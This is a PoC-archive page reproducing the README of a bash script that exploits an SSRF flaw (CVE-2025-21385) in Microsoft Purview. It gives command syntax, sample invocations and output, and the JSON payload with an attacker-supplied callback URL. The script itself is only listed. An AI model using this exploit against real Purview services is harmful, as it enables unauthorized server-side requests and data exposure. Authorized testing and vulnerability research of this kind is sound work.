关联漏洞
描述
The SSRF vulnerability in Microsoft Purview
介绍
# SSRF Exploit Script
This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**
## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI interface with clear error messages and help menu.
## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)
## Usage
### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```
### Options
| Option | Description |
|--------------------|--------------------------------------------------|
| `-h`, `--help` | Show the help menu. |
| `--exploit` `tu pu`| Perform the SSRF exploit with target and purview URLs. |
### Examples
#### Show Help Menu
```bash
./script.sh -h
```
Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```
#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```
Expected Output:
- If successful:
```
SSRF exploit successful! Data retrieved:
<response data>
```
- If unsuccessful:
```
SSRF exploit failed! HTTP code: <code>
```
## Script Workflow
1. The script parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request with a JSON payload to the `purview_url`, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.
## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```
### Payload Sent
```json
{
"callback": "http://callback-url.com"
}
```
### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.
## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.
## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.
## Contribution
Feel free to contribute by creating pull requests or reporting issues.
## License
[GNU GPL v3](LICENSE)
---
### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.
文件快照
[4.0K] /data/pocs/64b1d210d649a1c5df5c2a56f745e91ece7ebdda
├── [2.2K] CVE-2025-21385.sh
├── [ 34K] LICENSE
└── [2.8K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。